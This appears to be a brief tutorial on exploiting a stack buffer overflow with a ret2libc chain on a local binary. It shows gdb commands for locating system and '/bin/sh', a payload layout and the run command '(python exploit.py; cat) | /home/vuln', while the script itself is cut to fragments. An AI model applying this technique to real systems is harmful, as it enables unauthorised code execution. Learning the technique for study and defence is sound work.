How Buffer Overflow Works
Overwriting the return address of the stack with overflowing the buffer allows us to return another malicious address which ends up with code execution.
Keep that in mind if NX is enabled we can't just directly jump to shellcode
Stack state
1 | | | |
1 | junk_buf + system_call + exit_addr + /bin/sh |
Since we overwrite the return address with system’s address, we can give system arguments and make it execute commands
Chain Chain Chain the ROP baby
Simple ROP logic ,locally,is this,
1st –> find exact size of buffer to fill buffer+ebp.
2nd –> For overwriting the ret address find the system address with “p system” from gdb.
3rd –> Search for “/bin/sh” in the program with “memsearch /bin/sh” in order to skip calculating offset etc. because this way it will be calculated already. Don’t care about exit.
4th –> Construct your chain like this “junk_buf + system_addr + exit_addr + /bin/sh “
EXTERMINATE!!
Finding Addresses Locally
Start with this
gdb ./vuln
gdb gives you a great opportunity to do address calculations
1 | (gdb) x/x 0xb7e97000 + 0x00038fb0 |
Finding Libc base address
info proc map
Finding system address
p system
Finding /bin/sh
searchmem /bin/sh
Exploit in real action
1 | libc_base_addr = ldd /home/vuln | grep libc |
Example python script
1 | import struct |
To run the script with the binary use
1 | (python exploit.py; cat) | /home/vuln |